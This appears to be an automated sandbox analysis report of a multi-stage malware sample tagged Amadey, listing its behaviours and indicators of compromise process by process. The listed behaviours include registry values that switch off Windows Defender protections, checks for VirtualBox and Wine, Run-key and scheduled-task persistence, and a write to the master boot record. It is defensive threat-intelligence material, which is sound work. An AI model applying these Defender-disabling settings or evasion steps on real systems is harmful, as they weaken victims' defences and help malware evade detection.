amadey | 402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	b62397d435.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	b62397d435.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	b62397d435.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	b62397d435.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	b62397d435.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0a3d189781.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e5466dd896.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d744367ecb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b62397d435.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	db9f551680.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6629328f1f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5cf0a9b56c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	57dbff855a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a8ea2df2fa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	332	powershell.exe
12	1620	powershell.exe
13	2720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3428	powershell.exe
332	powershell.exe
1620	powershell.exe
2720	powershell.exe
3020	powershell.exe
2440	powershell.exe
1812	powershell.exe
2808	powershell.exe

Downloads MZ/PE file 20 IoCs

flow	pid	Process
11	2300	futors.exe
40	2176	svchost015.exe
43	2140	svchost015.exe
7	2500	rapes.exe
130	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
10	2500	rapes.exe
4	332	powershell.exe
12	1620	powershell.exe
13	2720	powershell.exe
125	2500	rapes.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0a3d189781.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e5466dd896.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b62397d435.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	db9f551680.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5cf0a9b56c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	db9f551680.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a8ea2df2fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0a3d189781.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6629328f1f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d744367ecb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	57dbff855a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	57dbff855a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e5466dd896.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6629328f1f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d744367ecb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5cf0a9b56c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b62397d435.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a8ea2df2fa.exe

Executes dropped EXE 29 IoCs

pid	Process
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
2500	rapes.exe
1928	amnew.exe
2300	futors.exe
852	6b651c8e26.exe
2180	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
2100	Rm3cVPI.exe
760	0a3d189781.exe
108	483d2fa8a0d53818306efeb32d3.exe
2176	svchost015.exe
2584	e5466dd896.exe
2836	6629328f1f.exe
2712	TbV75ZR.exe
2140	svchost015.exe
2920	hYjiwV0.exe
2204	EPTwCQd.exe
1072	7IIl2eE.exe
2788	Passwords.com
1864	d744367ecb.exe
2860	5cf0a9b56c.exe
1264	57dbff855a.exe
3020	ef157868ff.exe
3520	b62397d435.exe
3720	db9f551680.exe
3868	svchost015.exe
4004	a8ea2df2fa.exe
3236	svchost015.exe
3768	u75a1_003.exe
3876	565605dfbd.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	a8ea2df2fa.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	0a3d189781.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	6629328f1f.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	d744367ecb.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	5cf0a9b56c.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	db9f551680.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	e5466dd896.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	57dbff855a.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	b62397d435.exe

Loads dropped DLL 64 IoCs

pid	Process
332	powershell.exe
332	powershell.exe
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
2500	rapes.exe
1928	amnew.exe
2500	rapes.exe
1620	powershell.exe
1620	powershell.exe
2500	rapes.exe
2500	rapes.exe
2300	futors.exe
2300	futors.exe
2720	powershell.exe
2720	powershell.exe
760	0a3d189781.exe
2500	rapes.exe
2500	rapes.exe
2300	futors.exe
2300	futors.exe
2500	rapes.exe
2500	rapes.exe
2260	WerFault.exe
2260	WerFault.exe
2260	WerFault.exe
2260	WerFault.exe
2836	6629328f1f.exe
2500	rapes.exe
2500	rapes.exe
836	WerFault.exe
836	WerFault.exe
836	WerFault.exe
836	WerFault.exe
2500	rapes.exe
2500	rapes.exe
2792	WerFault.exe
2792	WerFault.exe
2792	WerFault.exe
2792	WerFault.exe
2500	rapes.exe
1072	7IIl2eE.exe
2752	CMD.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
3720	db9f551680.exe
2500	rapes.exe
2500	rapes.exe
4004	a8ea2df2fa.exe
2500	rapes.exe
2500	rapes.exe
2500	rapes.exe
3972	WerFault.exe
3972	WerFault.exe
3972	WerFault.exe
3972	WerFault.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	b62397d435.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	b62397d435.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\6629328f1f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10044020101\\6629328f1f.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\5cf0a9b56c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369570101\\5cf0a9b56c.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\57dbff855a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369580101\\57dbff855a.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef157868ff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369590101\\ef157868ff.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\b62397d435.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369600101\\b62397d435.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\6b651c8e26.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369180101\\6b651c8e26.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369190121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\0a3d189781.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10044010101\\0a3d189781.exe"	futors.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	e5466dd896.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000019249-62.dat	autoit_exe
behavioral1/files/0x000500000001c848-1027.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2800	tasklist.exe
2448	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
2500	rapes.exe
2180	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
760	0a3d189781.exe
108	483d2fa8a0d53818306efeb32d3.exe
2584	e5466dd896.exe
2836	6629328f1f.exe
1864	d744367ecb.exe
2860	5cf0a9b56c.exe
1264	57dbff855a.exe
3520	b62397d435.exe
3720	db9f551680.exe
4004	a8ea2df2fa.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 760 set thread context of 2176	760	0a3d189781.exe	68
PID 2836 set thread context of 2140	2836	6629328f1f.exe	74
PID 3720 set thread context of 3868	3720	db9f551680.exe	125
PID 4004 set thread context of 3236	4004	a8ea2df2fa.exe	127

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	ef157868ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6629328f1f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ef157868ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a3d189781.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	ef157868ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b62397d435.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d744367ecb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6b651c8e26.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	57dbff855a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5cf0a9b56c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	db9f551680.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a8ea2df2fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
2232	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
796	taskkill.exe
2312	taskkill.exe
1256	taskkill.exe
992	taskkill.exe
2888	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2616	schtasks.exe
2016	schtasks.exe
2860	schtasks.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
332	powershell.exe
332	powershell.exe
332	powershell.exe
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
2500	rapes.exe
1620	powershell.exe
1620	powershell.exe
1620	powershell.exe
2440	powershell.exe
2180	TempOQZXQOEKU5ENYFJCDR8U5U2GG2IZSGGE.EXE
1812	powershell.exe
2808	powershell.exe
2720	powershell.exe
2720	powershell.exe
2720	powershell.exe
760	0a3d189781.exe
108	483d2fa8a0d53818306efeb32d3.exe
2100	Rm3cVPI.exe
2100	Rm3cVPI.exe
2100	Rm3cVPI.exe
2100	Rm3cVPI.exe
2584	e5466dd896.exe
2836	6629328f1f.exe
2788	Passwords.com
2788	Passwords.com
2788	Passwords.com
3020	powershell.exe
2788	Passwords.com
2788	Passwords.com
2788	Passwords.com
2788	Passwords.com
1864	d744367ecb.exe
2860	5cf0a9b56c.exe
1864	d744367ecb.exe
1864	d744367ecb.exe
1864	d744367ecb.exe
1864	d744367ecb.exe
2860	5cf0a9b56c.exe
2860	5cf0a9b56c.exe
2860	5cf0a9b56c.exe
2860	5cf0a9b56c.exe
1264	57dbff855a.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3520	b62397d435.exe
3520	b62397d435.exe
3520	b62397d435.exe
3520	b62397d435.exe
3720	db9f551680.exe
3720	db9f551680.exe
4004	a8ea2df2fa.exe
4004	a8ea2df2fa.exe
3428	powershell.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2448	tasklist.exe
Token: SeDebugPrivilege	2800	tasklist.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	2888	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeDebugPrivilege	2912	firefox.exe
Token: SeDebugPrivilege	2912	firefox.exe
Token: SeDebugPrivilege	3520	b62397d435.exe
Token: SeDebugPrivilege	3428	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1760	2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2700	TempMB6LUR7RFKDXRIWBABO8EBLQGVAGREN4.EXE
1928	amnew.exe
852	6b651c8e26.exe
852	6b651c8e26.exe
852	6b651c8e26.exe
2788	Passwords.com
2788	Passwords.com
2788	Passwords.com
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
3020	ef157868ff.exe
2912	firefox.exe
2912	firefox.exe
2912	firefox.exe
2912	firefox.exe
3020	ef157868ff.exe
